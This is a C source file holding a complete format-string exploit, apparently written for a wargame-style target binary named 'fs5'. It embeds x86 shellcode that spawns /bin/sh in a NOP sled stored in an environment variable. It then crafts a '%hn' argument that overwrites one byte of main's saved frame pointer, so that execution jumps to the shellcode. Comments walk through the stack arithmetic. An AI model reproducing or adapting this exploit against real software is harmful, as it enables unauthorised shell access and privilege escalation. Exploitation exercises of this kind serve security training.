
/* Copyright 2002, Gal Badishi */

/* Effectively, we can overwrite only one byte to our liking, so we will
   overwrite main's saved frame pointer (the ebp register) in the function
   call to snprintf. Overwriting ebp will allow us to change esp when the
   leave instruction is issued in main, thus popping a return address from
   an (almost) arbitrary location on the stack. */

/* The problem is that we're actually writing two bytes of the form
   0x00XX, which in memory looks like 0xXX, 0x00 (little endian). This
   means that we can't change the LSB of ebp (which would have been
   optimal, since we could then change esp to point to our supplied
   argument) without zeroing the MSB of the LSW of ebp. If we want to
   change only the LSB, we can only change it to zero. Therefore, we
   must manipulate the environment variable's size, so that changing ebp
   under these restrictions will still point esp to our supplied argument. */

/* This time we also need to provide our own format strings, so more
   calcaulations are required. */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* execve and exit */

char shellcode[] =
  "\xeb\x1e\x8b\x1c\x24\x8d\x0c\x24\x31\xd2\x89\x54\x24\x04\x89\xd0"
  "\x5e\x88\x46\x07\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\xfe\xc0\xcd\x80"
  "\xe8\xdd\xff\xff\xff/bin/sh";

/* Debug the program (as if you're running it with the exploit, so the
   enironment variables and command line argument will be taken into
   consideration) to get this value. */

#define ORIGINAL_EBP_VALUE 0xbffff238

/* The stack below ebp looks like this:
     buf[256]
     3 arguments to snprintf
     return address
     saved ebp
   We want to change the LSB of ebp to zero. */

#define SAVED_EBP_ADDRESS ORIGINAL_EBP_VALUE - \
                          256 - \
                          3 * sizeof(unsigned int) - \
                          sizeof(unsigned int) - \
                          sizeof(unsigned int) - \
                          1   /* So we'll only change the LSB */

#define ENV_SIZE 2048
#define ENV_NAME "GAL="
#define NOP 0x90

/* Just in case you want something more complicated */

void fill_nops(char *buf, int size) {
  memset(buf, NOP, size);
}

/* See "usage" for the args */

int main(int argc, char **argv) {
  
  char arg1[256], *ptr;
  char *envbuf;
  unsigned int esp = (unsigned int) &esp;

  /* malloc one more byte for null termination */
  if ((envbuf = malloc(ENV_SIZE + 1)) == NULL) {
    perror("Error in malloc\n");
    exit(1);
  }
  ptr = envbuf;
  fill_nops(ptr, ENV_SIZE - strlen(shellcode));
  ptr += ENV_SIZE - strlen(shellcode);
  memcpy(ptr, shellcode, strlen(shellcode));
  ptr += strlen(shellcode);
  *ptr = '\0';
  ptr = arg1;
  *((unsigned int *) ptr) = SAVED_EBP_ADDRESS;
  ptr += sizeof(unsigned int *);
  *ptr++ = '%';
  *ptr++ = 'h';
  *ptr++ = 'n';   /* weird - I thought I needed one more for alignment... */
  /* Here we set our return address - we want the return address to point
     to our environment variable shellcode. */
  while (ptr < arg1 + sizeof(arg1) - sizeof(unsigned int *)) {
    *((unsigned int *) ptr) = esp;
    ptr += sizeof(unsigned int *);
  }
  *ptr = '\0';
  if (setenv(ENV_NAME, envbuf, 1) == -1) {
    perror("Error in setenv");
    free(envbuf);
    exit(2);
  }
  execl("./fs5", "./fs5", arg1, NULL);
  free(envbuf);
  return(0);
}
